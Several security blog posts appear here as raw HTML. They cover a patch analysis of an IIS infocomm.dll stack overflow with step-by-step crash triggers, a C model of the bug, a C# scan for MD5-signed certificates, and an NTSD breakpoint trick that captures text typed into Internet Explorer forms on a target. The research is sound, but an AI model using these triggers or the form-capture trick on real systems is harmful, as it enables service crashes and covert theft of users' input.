style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">input_filename </span><span style="color:navy;">+ 1;<br /></span><span style="color: rgb(128, 128, 255);">v15 >></span><span style="color:navy;">= 
2;<br /></span>memcpy<span style="color:navy;">(&</span><span style="color: rgb(128, 128, 255);">v25</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, 4 * </span><span style="color: rgb(128, 128, 255);">v15</span><span style="color:navy;">);<br /></span><span style="color: rgb(128, 128, 255);">v17 </span><span style="color:navy;">= &</span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">[4 * </span><span style="color: rgb(128, 128, 255);">v15</span><span style="color:navy;">];<br /></span><span style="color: rgb(128, 128, 255);">v18 </span><span style="color:navy;">= &</span><span style="color: rgb(128, 128, 255);">v25 </span><span style="color:navy;">+ 4 * </span><span style="color: rgb(128, 128, 255);">v15</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v19 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v16 & </span><span style="color:navy;">3;<br /></span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName;<br /></span>memcpy<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">v18</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v17</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v19</span><span style="color:navy;">);<br />do<br /></span><span style="color: rgb(128, 128, 255);">v20 </span><span style="color:navy;">= *</span><span style="color: rgb(128, 128, 255);">v8</span><span style="color:navy;">++;<br />while ( </span><span style="color: rgb(128, 128, 255);">v20 </span><span style="color:navy;">);<br /></span>memcpy<span style="color:navy;">(&</span><span style="color: rgb(128, 128, 255);">v26</span><span style="color:navy;">[</span><span 
style="color: rgb(128, 128, 255);">v9</span><span style="color:navy;">], </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName, </span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">- &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName[1] + 1);<br /></span><span style="color: rgb(128, 128, 255);">input_filename </span><span style="color:navy;">= &</span><span style="color: rgb(128, 128, 255);">v25</span><span style="color:navy;">;<br />}<br /></span></span><br />Patched version:<br /><br /><span style="background: white none repeat scroll 0% 50%; white-space: pre; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;font-family:FixedSys;color:blue;" ><span style="color:navy;"> if ( </span>_strchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">v4</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'~'</span><span style="color:navy;">) )<br />{<br /></span><span style="color: rgb(128, 128, 255);">result </span><span style="color:navy;">= </span>ConvertToLongFileName<span style="color:navy;">(*(</span><span style="color:gray;">char **</span><span style="color:navy;">)(</span><span style="color: rgb(128, 128, 255);">v3 </span><span style="color:navy;">+ 12), </span><span style="color: rgb(128, 128, 255);">v4</span><span style="color:navy;">, &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">);<br />if ( !</span><span style="color: rgb(128, 128, 255);">result </span><span style="color:navy;">)<br />return </span><span style="color: rgb(128, 128, 255);">result</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">= </span>_strrchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 
255);">v4</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'\\'</span><span style="color:navy;">);<br />if ( </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">)<br />{<br /></span><span style="color: rgb(128, 128, 255);">v9 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">v4 </span><span style="color:navy;">+ 1;<br /></span>memcpy<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">v24</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v4</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">v4 </span><span style="color:navy;">+ 1);<br /></span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName;<br /></span><span style="color: rgb(128, 128, 255);">v10 </span><span style="color:navy;">= 261 - </span><span style="color: rgb(128, 128, 255);">v9</span><span style="color:navy;">;<br />do<br /></span><span style="color: rgb(128, 128, 255);">v17 </span><span style="color:navy;">= *</span><span style="color: rgb(128, 128, 255);">v8</span><span style="color:navy;">++;<br />while ( </span><span style="color: rgb(128, 128, 255);">v17 </span><span style="color:navy;">);<br />if ( </span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">- &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName[1] + 1 < </span><span style="color: rgb(128, 128, 255);">v10 </span><span style="color:navy;">)<br />{<br /></span><span style="color: rgb(128, 128, 255);">v11 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 
255);">FindFileData</span><span style="color:navy;">.cFileName;<br />do<br /></span><span style="color: rgb(128, 128, 255);">v18 </span><span style="color:navy;">= *</span><span style="color: rgb(128, 128, 255);">v11</span><span style="color:navy;">++;<br />while ( </span><span style="color: rgb(128, 128, 255);">v18 </span><span style="color:navy;">);<br /></span><span style="color: rgb(128, 128, 255);">v10 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v11 </span><span style="color:navy;">- &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName[1] + 1;<br />}<br /></span><span style="color: rgb(128, 128, 255);">v3 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v22</span><span style="color:navy;">;<br /></span>memcpy<span style="color:navy;">(&</span><span style="color: rgb(128, 128, 255);">v24</span><span style="color:navy;">[</span><span style="color: rgb(128, 128, 255);">v9</span><span style="color:navy;">], </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName, </span><span style="color: rgb(128, 128, 255);">v10</span><span style="color:navy;">);<br /></span><span style="color: rgb(128, 128, 255);">v25 </span><span style="color:navy;">= 0;<br /></span><span style="color: rgb(128, 128, 255);">v4 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v24</span><span style="color:navy;">;<br />}</span></span><br /><br /><span style="font-weight: bold;font-size:130%;" >Runtime analysis</span><br /><br />At this point, a little bit of runtime analysis using <a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx">WinDbg</a> could help us to get the whole picture.<br /><br />Being attached to the <span style="font-size:85%;"><span style="font-family:courier new;">inetinfo.exe</span></span> process (where <span style=";font-family:courier 
new;font-size:85%;" >infocomm.dll</span> is loaded, according to Sysinternals <a href="http://www.microsoft.com/technet/sysinternals/ProcessesAndThreads/Handle.mspx">handle</a> utility), we set a breakpoint on <span style="font-size:85%;"><span style="font-family:courier new;">FileChanged()</span></span>:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">0:016> .reload /f</span><br /><span style="font-family:courier new;">Reloading current modules</span> <span style="font-family:courier new;">...</span><span style="font-family:courier new;">...............................................................</span><br /><span style="font-family:courier new;">0:016> bp CVRootDirMonitorEntry::FileChanged</span> <span style="font-family:courier new;"><br />0:016> bl</span><br /><span style="font-family:courier new;">0 e 71ba7ca0 0001 (0001) 0:**** INFOCOMM!CVRootDirMonitorEntry::FileChanged</span><br /><span style="font-family:courier new;">0:016> g</span></span><br /><br />Given the name of the function under scrutiny, we suspect it will be called during file operations inside the Web root:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">echo "hello" > c:\inetpub\wwwroot\test.txt</span></span><br /><br />It worked! 
Moreover, we can confirm that the first argument passed to <span style="font-size:85%;"><span style="font-family:courier new;">FileChanged()</span></span>, which is of type <span style="font-size:85%;"><span style="font-family:courier new;">char*</span></span> according to debug symbols, is the filename.<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">Breakpoint 0 hit</span><br /><span style="font-family:courier new;">eax=00000000 ebx=00000008 ecx=00712430 edx=007238c4 esi=007238a8<br />edi=007238a8</span><span style="font-family:courier new;"> eip=71ba7ca0 esp=009cfed8 ebp=009cff0c<br />iopl=0 nv up ei pl zr na pe nc</span><br /><span style="font-family:courier new;">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246</span> <span style="font-family:courier new;">INFOCOMM!CVRootDirMonitorEntry::FileChanged:</span><br /><span style="font-family:courier new;">71ba7ca0 8bff mov edi,edi<br /></span><span style="font-family:courier new;"><br />0:004> da poi(esp+4)</span><br /><span style="font-family:courier new;">009cfee4 "test.txt"</span></span><br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Summary of our findings</span></span><br /><br />Not everything makes sense for now, but we have gathered much interesting information during this preliminary analysis phase:<br /><ul><li><span style="font-size:85%;"><span style="font-family:courier new;">CVRootDirMonitorEntry::FileChanged()</span></span> does (possibly insecure) string manipulation.<br /></li><li>This function is called whenever a file under the Web root is "touched". 
The filename is passed as the first argument.<br /></li><li>The offending code will be reached only if the filename contains the "~" character, <span style="font-style: italic;">and</span> the "\" character (thus being inside a subdirectory).</li><li><span style=";font-family:courier new;font-size:85%;" >ConvertToLongFileName()</span> will be called in between on the filename.<br /></li></ul><span style="font-weight: bold;font-size:130%;" >A bug, really ?<br /></span><br />At this point, we need to have a closer look at <span style=";font-family:courier new;font-size:85%;" >ConvertToLongFileName()</span> internals.<br /><br />According to debug symbols, the function prototype is:<br /><span style="font-size:85%;"><span style="font-family:courier new;">int __stdcall ConvertToLongFileName(char *, LPCSTR lpString2, LPWIN32_FIND_DATAA lpFindFileData)</span></span><br /><br />Implementation of this function is trivial: it takes the filename as an argument and uses <span style=";font-family:courier new;font-size:85%;" >FindFirstFileA() </span>on it. The corresponding <span style="font-size:85%;"><span style="font-family:courier new;">WIN32_FIND_DATA</span></span> structure is passed back to the caller for future use.<br /><br /><a href="http://msdn.microsoft.com/en-us/library/aa364418%28VS.85%29.aspx">MSDN documentation</a> relative to <span style="font-size:85%;"><span style="font-family:courier new;">FindFirstFile()</span></span> is pretty straightforward. 
The <a href="http://msdn.microsoft.com/en-us/library/aa365740%28VS.85%29.aspx">WIN32_FIND_DATA</a> structure is more interesting:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">typedef struct _WIN32_FIND_DATA {</span><br /><span style="font-family:courier new;">DWORD dwFileAttributes;</span><br /><span style="font-family:courier new;">FILETIME ftCreationTime;</span><br /><span style="font-family:courier new;">FILETIME ftLastAccessTime;</span><br /><span style="font-family:courier new;">FILETIME ftLastWriteTime;</span><br /><span style="font-family:courier new;">DWORD nFileSizeHigh;</span><br /><span style="font-family:courier new;">DWORD nFileSizeLow;</span><br /><span style="font-family:courier new;">DWORD dwReserved0;</span><br /><span style="font-family:courier new;">DWORD dwReserved1;</span><br /><span style="font-family:courier new;">TCHAR cFileName[MAX_PATH];</span><br /><span style="font-family:courier new;">TCHAR cAlternateFileName[14];</span><br /><span style="font-family:courier new;">}<br />WIN32_FIND_DATA,</span> <span style="font-family:courier new;">*PWIN32_FIND_DATA,</span> <span style="font-family:courier new;">*LPWIN32_FIND_DATA;</span></span><br /><span style="font-size:85%;"></span><span style="font-size:100%;"><br />The caller will copy </span><span style="font-size:100%;"><span style=";font-family:courier new;font-size:85%;" >FindFileData.cFileName</span> into a fixed size buffer of 264 bytes. Since </span><span style="font-size:100%;"><span style=";font-family:courier new;font-size:85%;" >MAX_PATH</span> has a value of 260 on the Windows platform, this is probably </span><span style="font-size:100%;"><span style="font-family:courier new;"><span style="font-size:85%;">MAX_PATH+1</span></span> aligned to a DWORD. Where is the trick ?</span><br /><br /><span style="font-weight: bold;font-size:130%;" >Where Unicode comes into play<br /></span><br />The trick is called Unicode. 
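As an added example (my own C, not code from infocomm.dll or from this post), the following models the copy discussed above: the unpatched arithmetic shows how many bytes land in the 264-byte buffer once the directory prefix and the expanded long name are concatenated, and the patched variant applies the 261 - v9 budget visible in the decompiled fix. Function names, the 200-character directory and file names and the 8.3 short name are constructed for the example.

```c
/* Model of the FileChanged() expansion discussed in the post.
 * Added example: re-implements the described logic in plain C; it is NOT
 * the code of infocomm.dll. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifndef MAX_PATH
#define MAX_PATH 260
#endif
#define OUT_BUF 264             /* size of the fixed stack buffer named in the post */

/* Bytes the unpatched code writes: everything up to and including the last
 * '\' of the short-name path, then the expanded long name plus its NUL.
 * Pure arithmetic, so calling it never overflows anything. */
size_t unpatched_bytes_written(const char *input, const char *long_name)
{
    const char *bs = strrchr(input, '\\');
    if (bs == NULL)
        return strlen(input) + 1;            /* no subdirectory: copied as is */
    size_t prefix = (size_t)(bs - input) + 1;
    return prefix + strlen(long_name) + 1;
}

/* Expansion with the bound the patch introduced: the long name only gets the
 * room left after the prefix (the "261 - v9" budget) and the result is always
 * NUL-terminated inside the buffer. Returns the result length and sets
 * *truncated when the long name did not fit. */
size_t expand_patched(const char *input, const char *long_name,
                      char out[OUT_BUF], bool *truncated)
{
    const char *bs = strrchr(input, '\\');
    *truncated = false;
    if (bs == NULL) {
        size_t n = strlen(input);
        if (n > MAX_PATH) { n = MAX_PATH; *truncated = true; }
        memcpy(out, input, n);
        out[n] = '\0';
        return n;
    }
    size_t prefix = (size_t)(bs - input) + 1;          /* v9 in the decompiled code */
    if (prefix > MAX_PATH + 1) { prefix = MAX_PATH + 1; *truncated = true; }
    size_t budget = (MAX_PATH + 1) - prefix;           /* v10 = 261 - v9 */
    size_t need   = strlen(long_name) + 1;             /* strlen(cFileName) + NUL */
    size_t ncopy  = need;
    if (need > budget) { ncopy = budget; *truncated = true; }
    memcpy(out, input, prefix);
    memcpy(out + prefix, long_name, ncopy);
    out[prefix + ncopy] = '\0';                        /* index <= 261 < OUT_BUF */
    return strlen(out);
}

/* Constructed scenario mirroring the "Do it yourself" steps: a directory of
 * 200 'A' and a file of 200 'B' reached through its 8.3 short name. */
static void make_long_case(char input[512], char long_name[512])
{
    memset(input, 'A', 200);
    memcpy(input + 200, "\\BBBBBB~1", sizeof "\\BBBBBB~1"); /* 10 bytes incl. NUL */
    memset(long_name, 'B', 200);
    long_name[200] = '\0';
}

size_t long_case_unpatched_bytes(void)          /* 402 bytes into a 264-byte buffer */
{
    char input[512], long_name[512];
    make_long_case(input, long_name);
    return unpatched_bytes_written(input, long_name);
}

size_t long_case_patched_len(void)              /* 261: prefix plus what fits */
{
    char input[512], long_name[512], out[OUT_BUF];
    bool truncated;
    make_long_case(input, long_name);
    return expand_patched(input, long_name, out, &truncated);
}

int long_case_patched_truncated(void)           /* 1: the long name was cut */
{
    char input[512], long_name[512], out[OUT_BUF];
    bool truncated;
    make_long_case(input, long_name);
    expand_patched(input, long_name, out, &truncated);
    return truncated ? 1 : 0;
}

const char *short_case_result(void)             /* "sub\longname.txt", untouched */
{
    static char out[OUT_BUF];
    bool truncated;
    expand_patched("sub\\LONGNA~1", "longname.txt", out, &truncated);
    return truncated ? "" : out;
}

int main(void)
{
    printf("unpatched: %zu bytes written into a %d-byte buffer\n",
           long_case_unpatched_bytes(), OUT_BUF);
    printf("patched:   %zu bytes, truncated=%d\n",
           long_case_patched_len(), long_case_patched_truncated());
    printf("short case: %s\n", short_case_result());
    return 0;
}
```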
Quoting <a href="http://msdn.microsoft.com/en-us/library/aa365247.aspx">MSDN documentation</a>:<br /><blockquote style="font-style: italic;">In the Windows API (with some exceptions discussed in the following paragraphs), the maximum length for a path is MAX_PATH, which is defined as 260 characters.<br />(...)<br />The Windows API has many functions that also have Unicode versions to permit an extended-length path for a maximum total path length of 32,767 characters.</blockquote>What about <a href="http://msdn.microsoft.com/en-us/library/aa363858%28VS.85%29.aspx">CreateFile</a> ?<br /><blockquote style="font-style: italic;">The Unicode versions of several functions permit a maximum path length of approximately 32,000 characters composed of components up to 255 characters in length.</blockquote>Therefore, it is possible to build a very long Unicode path, as long as each path token is less than 255 characters long. There is a little quirk in <span style="font-size:85%;"><span style="font-family:courier new;">FindFirstFile()</span></span> documentation here: <span style="font-size:85%;"><span style="font-family:courier new;">cFileName</span><span style="font-family: courier new;"></span></span> cannot be longer than <span style="font-size:85%;"><span style="font-family: courier new;">MAX_PATH</span></span>, <span style="font-style: italic;">but</span> the full path to this file can go far beyond <span style="font-size:85%;"><span style="font-family: courier new;"></span><span style="font-family:courier new;">MAX_PATH.</span></span><br /><br /><span style="font-weight: bold;font-size:130%;" >Do it yourself</span><br /><br />Here are the steps to trigger the bug:<br /><ul><li>Using the <span style=";font-family:courier new;font-size:85%;" >mkdir</span><span style="font-family:courier new;"></span> command, create a directory inside <span style="font-size:85%;"><span style="font-family:courier new;">C:\Inetpub\wwwroot</span></span> with a long name (200 times 'A', for 
instance).<br /></li><li>Using <span style=";font-family:courier new;font-size:85%;" >CreateFile("\\?\C:\Inetpub\wwwroot\AAA...AAA\BBB...BBB")</span>, create inside this directory a file with a long name (200 times 'B', for instance). This API call must be Unicode-style, because the resulting full path will be longer than <span style="font-size:85%;"><span style="font-family:courier new;">MAX_PATH</span></span>.<br /></li><li>Now access this file using its short name, as reported by the <span style="font-size:85%;"><span style="font-family:courier new;">dir /x</span></span> command. In this example, this would be something like <span style="font-size:85%;"><span style="font-family:courier new;">echo toto > bbbbbb~1</span></span>.<br /></li></ul>Et voilà! IIS should crash, because it expanded "aaa...aaa\bbbbbb~1" into the "aaa...aaa" and "bbb...bbb" strings, which are then concatenated into a stack-based buffer of size <span style="font-size:85%;"><span style="font-family:courier new;">MAX_PATH</span></span>.<br /><br />Since <span style="font-size:85%;"><span style="font-family:courier new;">infocomm.dll</span></span> has been compiled with the <span style="font-size:85%;"><span style="font-family:courier new;">/GS</span></span> option, a stack cookie prevents direct exploitation of this bug. Exploitation on IIS 5 is left as an exercise to the reader ;)<br /><br /><span style="font-weight: bold;font-size:130%;" >Conclusion</span><br /><br />That was a very nice bug to study (even if it ended up in a trivial stack overflow) because it requires good knowledge of Windows internals.<br /><br />As usual, it would be nice to know "how" this bug has been found by the original author. However, using Unicode filenames breaks so many applications out there that it could have been found by accident ;)<br /><br />PS. 
Happy New Year to all readers!<br /><br /><span style="font-weight: bold;font-size:130%;" >Having fun with certificates</span> (2009-01-01)<br /><br />Unless you went on vacation without WiFi access, your iPhone and your BlackBerry, you certainly have heard of the latest "Internet is dead" issue.<br /><br />All details are available <a href="http://www.win.tue.nl/hashclash/rogue-ca/">here</a> and <a href="http://www.phreedom.org/research/rogue-ca/">there</a>. A comprehensive analysis is available on the <a href="http://broadcast.oreilly.com/2008/12/the-sky-is-not-falling-on-toda.html">O'Reilly</a> blog. A summary is available on the <a href="http://isc.sans.org/diary.html?storyid=5590">ISC</a> blog.<br /><br />Now this is where C# beauty comes into play. Here is a code snippet that will check the signature algorithm used by every certificate in the local certificate store(s). Everything that is <span style="font-style: italic;">not</span> <span style="font-size:85%;"><span style="font-family: courier new;">sha1RSA</span></span> is displayed, because it should be <span style="font-style: italic;">bad</span> (according to <a href="http://blogs.technet.com/swi/archive/2008/12/30/information-regarding-md5-collisions-problem.aspx">Microsoft analysis</a>).<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">using System;</span><br /><span style="font-family: courier new;">using System.Security.Cryptography.X509Certificates;</span><br /><br /><span style="font-family: courier new;">namespace SearchCerts</span><br /><span style="font-family: courier new;">{</span><br /><span style="font-family: courier new;"> class Program</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> static void Main(string[] args)</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> // *** 
select appropriate store below ***</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.My);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.AuthRoot);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.CertificateAuthority);</span><br /><span style="font-family: courier new;"> var store = new X509Store(StoreName.Root); // the one store left uncommented, so the snippet compiles as-is</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.TrustedPeople);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.TrustedPublisher);</span><br /><br /><span style="font-family: courier new;"> store.Open(OpenFlags.OpenExistingOnly | OpenFlags.ReadOnly);</span><br /><span style="font-family: courier new;"> foreach (var cert in store.Certificates)</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> // report anything not signed with sha1RSA (md5RSA, md2RSA, ...)</span><br /><span style="font-family: courier new;"> if (cert.SignatureAlgorithm.FriendlyName != "sha1RSA")</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("------------------------------");</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[FriendlyName]\t" + cert.FriendlyName);</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[Issuer]\t" + cert.Issuer);</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[Subject]\t" + cert.Subject);</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[Signature]\t" + cert.SignatureAlgorithm.FriendlyName);</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;"> store.Close();</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("finished");</span><br /><span style="font-family: courier new;"> 
System.Console.ReadLine();</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;">}</span></span><br /><br />Here are some results from <span style="font-style: italic;">my</span> certificate stores. Your mileage may vary.<br /><br /><a href="http://freephonie.org/portal.php">Freephonie</a> PKI is using MD5. End-users cannot submit <a href="http://en.wikipedia.org/wiki/Certificate_signing_request">CSR</a>s by themselves, so the risk remains low. I'd be glad to know if the Freebox itself can send CSRs.<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] O=Free, L=Paris, S=France, C=FR</span><br /><span style="font-family: courier new;">[Subject] CN=1234567, O=Free, L=Paris, S=France, C=FR</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br /><a href="http://igc.services.cnrs.fr/CNRS-Standard/">CNRS-Standard</a> and <a href="http://igc.services.cnrs.fr/CNRS-Plus/">CNRS-Plus</a> PKI are using MD5. 
This is more concerning, because those are widely used authorities, and users can request certificates "at will".<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] CN=CNRS, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Subject] CN=CNRS-Plus, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span><br /><br /><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] CN=CNRS, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Subject] CN=CNRS-Standard, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br />The <a href="http://www.microsoft.com/whdc/winlogo/drvsign/drvsign.mspx">Microsoft</a> driver signing PKI (at least on Windows XP SP2) is also using MD5. Since driver developers can ask for signatures, this is concerning too. 
But I feel that this authority might not be used by Microsoft anymore for newer signatures, given its old age.<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] CN=Microsoft Root Authority, OU=Microsoft Corporation, OU=Copyri</span><span style="font-family: courier new;">ght (c) 1997 Microsoft Corp.</span><br /><span style="font-family: courier new;">[Subject] CN=Microsoft Windows Hardware Compatibility, OU=Microsoft Corpor</span><span style="font-family: courier new;">ation, OU=Microsoft Windows Hardware Compatibility Intermediate CA, OU=Copyright</span><span style="font-family: courier new;"> (c) 1997 Microsoft Corp.</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br />Some random <a href="https://www.netlock.net/">foreign authorities</a>, which are using obscure certification policies.<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName] NetLock Uzleti (Class B) Tanusitvanykiado</span><br /><span style="font-family: courier new;">[Issuer] CN=NetLock Uzleti (Class B) Tanusitvanykiado, OU=Tanusitvanykiad</span><span style="font-family: courier new;">ok, O=NetLock Halozatbiztonsagi Kft., L=Budapest, C=HU</span><br /><span style="font-family: courier new;">[Subject] CN=NetLock Uzleti (Class B) Tanusitvanykiado, OU=Tanusitvanykiad</span><span style="font-family: courier new;">ok, O=NetLock Halozatbiztonsagi Kft., L=Budapest, C=HU</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br />And last but not least, this VeriSign authority is using ... 
MD2 (this is not the only one, unfortunately).<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName] VeriSign</span><br /><span style="font-family: courier new;">[Issuer] OU=VeriSign Commercial Software Publishers CA, O="VeriSign, Inc.", L=Internet</span><br /><span style="font-family: courier new;">[Subject] OU=VeriSign Commercial Software Publishers CA, O="VeriSign, Inc.", L=Internet</span><br /><span style="font-family: courier new;">[Signature] md2RSA</span></span><br /><br />PS. <a href="http://www.impots.gouv.fr/">impots.gouv.fr</a> is NOT vulnerable ;)<br /><br /><span style="font-weight: bold;font-size:130%;" >Pentester trick #6: logging Internet Explorer boxes</span> (2008-12-19)<br /><br />In a previous post (<a href="http://newsoft-tech.blogspot.com/2008/08/pentester-trick-5-debugging-without.html"><span class="Apple-style-span" style="font-style: italic;">Debugging Without Debugger</span></a>), I promised to explain how to log content from text areas within <span style="font-weight: bold;">Internet Explorer</span> Web pages.<div><br /></div><div>If you tried to apply the previously described technique to Internet Explorer, you should have noticed that <span style=";font-family:courier new;font-size:85%;" >GetWindowText</span> is never called for getting text from Web controls. This is because the whole Web page is rendered without relying on standard Windows controls.</div><div><br /></div><div>Therefore, we need to find the <span style="font-size:85%;">GetWindowTextLength/GetWindowText</span> equivalents in <span style="font-size:85%;"><span style="font-family: courier new;">MSHTML.DLL</span></span>. Fortunately, debugging symbols will help us a lot in this case. 
The equivalent functions are:</div><div><br /></div><div><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainTextLength()<br /></span></div><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainText()</span></div><div><br /></div><div>They are called from 3 locations, the most common being:<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">mshtml!CElement::GetPlainTextInScope()</span></span></div><div><br />Unfortunately, NTSD does not seem to handle symbols properly, which prevents us from setting a symbolic breakpoint :(<br /><br />Since <span style="font-size:85%;"><span style="font-family: courier new;">MSHTML.DLL</span></span> is upgraded by virtually every cumulative patch for Internet Explorer, you really need to get access to the debugging symbols for the specific Internet Explorer version installed on the target (hint: use the SYMCHK utility shipped with the <a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx">Debugging Tools</a>) and find the appropriate addresses inside.<br /><br />From my up-to-date Internet Explorer 7 installation, here are some sample addresses:<br /><br /><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainTextLength : 0x44BB3B85 (entry point) -> 0x44BB3BFD (ret)<br /></span></div><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainText : 0x44BB3C05 (entry point) -> 0x44BB3C75 (ret)<br /></span></div><span style="font-family: courier new;font-size:85%;" >mshtml!CElement::GetPlainTextInScope : </span><span style="font-size:85%;"><span style="font-family: courier new;">0x44BB3CA6 (entry point) -> 0x44BB3D46 (ret)</span></span><br /><br />The epilogue of the <span style="font-size:85%;"><span style="font-family: courier new;">GetPlainTextInScope</span></span> function is:<br /><br /><span style="font-size:85%;"><span style="font-family: courier 
new;">.text:44BB3D3F mov eax, [ebp+var_4]</span><br /><span style="font-family: courier new;">.text:44BB3D42 pop edi</span><br /><span style="font-family: courier new;">.text:44BB3D43 pop esi</span><br /><span style="font-family: courier new;">.text:44BB3D44 pop ebx</span><br /><span style="font-family: courier new;">.text:44BB3D45 leave</span><br /><span style="font-family: courier new;">.text:44BB3D46 retn 4</span><br /><span style="font-family: courier new;">.text:44BB3D46 ?GetPlainTextInScope@CElement@@QAEJPAVCStr@@@Z endp</span></span><br /><br />From here, it is nice to know that ESI points to the Unicode text content before being overwritten at address <span style="font-size:85%;"><span style="font-family: courier new;">0x44BB3D43</span></span>. Therefore the following NTSD commands will do the trick:</div><div><br /></div><div><span style="font-size:85%;"><span style="font-family: courier new;">ntsd -pn iexplore.exe</span><br /><span style="font-family: courier new;">bp 0x44BB3D43 "du poi(esi); g;"</span><br /></span><br /></div><div>Awkward trick I must admit, but it could save pentesters' lives anyway ;)<br /></div></div><br /><br /><span style="font-weight: bold;font-size:130%;" >Reversing COM components</span> (2008-08-23)<br /><br />There are many free tools available that could prove helpful for analyzing COM components. 
